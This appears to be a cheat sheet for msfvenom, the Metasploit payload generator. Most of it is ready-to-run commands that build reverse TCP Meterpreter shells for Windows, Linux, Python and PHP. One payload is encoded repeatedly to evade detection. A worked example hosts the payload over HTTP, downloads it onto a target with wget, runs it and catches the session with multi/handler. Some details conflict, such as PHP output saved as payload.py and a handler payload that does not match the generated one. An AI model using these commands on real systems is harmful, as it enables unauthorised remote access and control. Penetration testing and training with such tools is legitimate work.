Msfvenom

Introduction

Msfvenom is the standalone command-line utility within the Metasploit Framework used to generate and encode custom payloads.

Basic usage syntax

msfvenom -p <payload> [options] -e <encoder> -i <iterations> -f <format> -o <output file>

Commands

List all the msfvenom payloads

$ msfvenom -l payloads

List all the supported output formats

$ msfvenom -l formats

Generate a Reverse TCP Meterpreter payload for Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

(This command generates a Windows executable file (payload.exe) containing a reverse TCP Meterpreter payload that connects back to the attacker's machine at 192.168.1.100 on port 4444)

Generate and encoded payload

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f elf -o payload.elf

(This command generates a Linux ELF executable (payload.elf) containing a reverse TCP Meterpreter payload, encoded five times using the x86/shikata_ga_nai encoder)

Generate a python script for reverse shell

$ msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py

Generate a PHP code for reverse shell

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py

(Note: You need to edit the reverse_shell.php file to convert it into a working PHP file by removing comments and adding closing tag)

Multi Handler

It is a msf module required to recieve and listen to the incoming connections.

For using it, open up the msfconsole prompt using msfconsole command, then follow the given workflow:

msf6> use exploit/multi/handler

msf6> set payload php/meterpreter/reverse_php

(The payload should be same as that used before to generate the msfvenom payload)

msf6> set lhost 192.168.0.100

(The lhost value should be the IP address for your local machine)

msf6> set lport 4444

(Set the unused port, which is the same as the one used in the msfvenom payload)

msf6> run

Some payloads

Note: You can view the required payload by using grep command along with the command to list the msfvenom payloads (msfvenom -l paylaods)

Example

Here is an example showcasing the basic workflow (We have access to the target machine and we want to create a reverse shell):

1. First connect to the target machine via ssh

$ ssh [username]@[target_ip]

1. Create a payload for reverse shell after connecting to the target machine (on local machine)

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[local_machine_ip] LPORT=[port] -f elf > rev_shell.elf

1. Then host it using python's http.server module (on local machine)

$ python3 -m http.server [port]

(Alternatively, you can use Apache server in your local machine to host it)

1. Download the created reverse shell file in the accessed target machine (file was hosted in the given port on your local machine)

$ wget http://[local_machine_ip]:[port]/rev_shell.elf

1. Listen to the connection in your local machine using Multi Handler

msf6> use exploit/multi/handler
msf6> set payload linux/x86/meterpreter/reverse_tcp
msf6> set lhost [local_machine_ip]
msf6> set lport [port]
msf6> run

1. Finally run the .elf file for creating meterpreter session in the target machine connection

$ ./rev_shell.elf

(You may need to give executable permission to the rev_shell.elf file as: sudo chmod 777 rev_shell.elf)

Hence, you will have the meterpreter session in your local machie which was listening to connections using Multi Handler.